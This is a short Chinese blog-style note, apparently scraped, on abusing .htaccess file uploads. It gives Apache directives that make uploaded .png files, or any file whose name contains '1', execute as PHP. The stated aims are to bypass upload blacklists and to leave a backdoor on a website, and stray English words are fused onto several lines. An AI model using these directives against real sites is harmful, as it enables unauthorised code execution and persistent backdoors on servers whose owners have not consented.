.htaccess文件上传利用

通常.htaccess能够用来留后门和针对黑名单绕过php

建立一个txt写入app

AddType  application/x-httpd-php    .png

打开另存为网站

保存类型为全部文件spa

上传.htaccess 必须是网站根路径 code

让png解析为php blog

2.留后门 能够在.htaccess 加入php解析规则io

相似于把文件名包含1的解析成phpclass

<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>

123456.png  就会以php执行im

相关文章
相关标签/搜索